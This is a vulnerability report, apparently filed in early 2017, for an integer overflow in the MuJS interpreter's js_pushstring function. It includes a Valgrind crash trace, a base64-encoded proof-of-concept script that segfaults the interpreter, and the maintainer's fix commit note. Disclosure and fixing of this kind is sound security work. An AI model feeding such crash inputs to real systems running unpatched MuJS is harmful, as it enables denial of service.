Howdy there is a int overflow in js_pushstring function in jsrun.c source when parsing corrupted JS input. Version: latest from git as of 23/01/2017 Vulnerable Source file: mujs/jsrun.c Function: js_pushstring Compile Flags CFLAGS += -g3 -ggdb -O0 Compile Command: make Valgrind shows it pretty clear: valgrind ./mujs-clean/build/mujs PoC.js ==1340== Memcheck, a memory error detector ==1340== Copyright (C) 2002-2013, and GNU GPL'd, by Julian Seward et al. ==1340== Using Valgrind-3.10.0 and LibVEX; rerun with -h for copyright info ==1340== Command: ./mujs-clean/build/mujs PoC.js ==1340== ==1340== Invalid read of size 1 ==1340== at 0x4C2C1A2: strlen (vg_replace_strmem.c:412) ==1340== by 0x403E80: js_pushstring (jsrun.c:114) ==1340== by 0x41611A: Ap_join (jsarray.c:138) ==1340== by 0x416DA7: Ap_toString (jsarray.c:398) ==1340== by 0x406F77: jsR_callcfunction (jsrun.c:1023) ==1340== by 0x4072A0: js_call (jsrun.c:1065) ==1340== by 0x409CCE: jsV_toString (jsvalue.c:56) ==1340== by 0x409EBB: jsV_toprimitive (jsvalue.c:103) ==1340== by 0x40A4B7: jsV_tonumber (jsvalue.c:209) ==1340== by 0x4047B9: js_tonumber (jsrun.c:261) ==1340== by 0x408C6F: jsR_run (jsrun.c:1484) ==1340== by 0x406EBD: jsR_callscript (jsrun.c:1006) ==1340== Address 0x0 is not stack'd, malloc'd or (recently) free'd ==1340== ==1340== ==1340== Process terminating with default action of signal 11 (SIGSEGV) ==1340== Access not within mapped region at address 0x0 ==1340== at 0x4C2C1A2: strlen (vg_replace_strmem.c:412) ==1340== by 0x403E80: js_pushstring (jsrun.c:114) ==1340== by 0x41611A: Ap_join (jsarray.c:138) ==1340== by 0x416DA7: Ap_toString (jsarray.c:398) ==1340== by 0x406F77: jsR_callcfunction (jsrun.c:1023) ==1340== by 0x4072A0: js_call (jsrun.c:1065) ==1340== by 0x409CCE: jsV_toString (jsvalue.c:56) ==1340== by 0x409EBB: jsV_toprimitive (jsvalue.c:103) ==1340== by 0x40A4B7: jsV_tonumber (jsvalue.c:209) ==1340== by 0x4047B9: js_tonumber (jsrun.c:261) ==1340== by 0x408C6F: jsR_run (jsrun.c:1484) ==1340== by 0x406EBD: jsR_callscript (jsrun.c:1006) ==1340== If you believe this happened as a result of a stack ==1340== overflow in your program's main thread (unlikely but ==1340== possible), you can try to increase the size of the ==1340== main thread stack using the --main-stacksize= flag. ==1340== The main thread stack size used in this run was 8388608. ==1340== ==1340== HEAP SUMMARY: ==1340== in use at exit: 129,584 bytes in 1,269 blocks ==1340== total heap usage: 1,343 allocs, 74 frees, 136,545 bytes allocated ==1340== ==1340== LEAK SUMMARY: ==1340== definitely lost: 0 bytes in 0 blocks ==1340== indirectly lost: 0 bytes in 0 blocks ==1340== possibly lost: 0 bytes in 0 blocks ==1340== still reachable: 129,584 bytes in 1,269 blocks ==1340== suppressed: 0 bytes in 0 blocks ==1340== Rerun with --leak-check=full to see details of leaked memory ==1340== ==1340== For counts of detected and suppressed errors, rerun with: -v ==1340== ERROR SUMMARY: 1 errors from 1 contexts (suppressed: 0 from 0) Segmentation fault PoC (base64 encoded): KyBBcnJheSggbnVsbC00KQ== PoC execution: base64 -d /tmp/b64PoC.poc > /tmp/proof.js valgrind ./mujs-clean/build/mujs /tmp/proof.js
Fixed in commit 4006739a28367c708dea19aeb19b8a1a9326ce08 Author: Tor Andersson <tor.andersson@gmail.com> Date: Tue Jan 24 14:42:36 2017 +0100 Fix 697497: Ensure array length is positive. As a side effect when changing to using regular integers (and avoid the nightmare of mixing signed and unsigned) we accidentally allowed negative array lengths.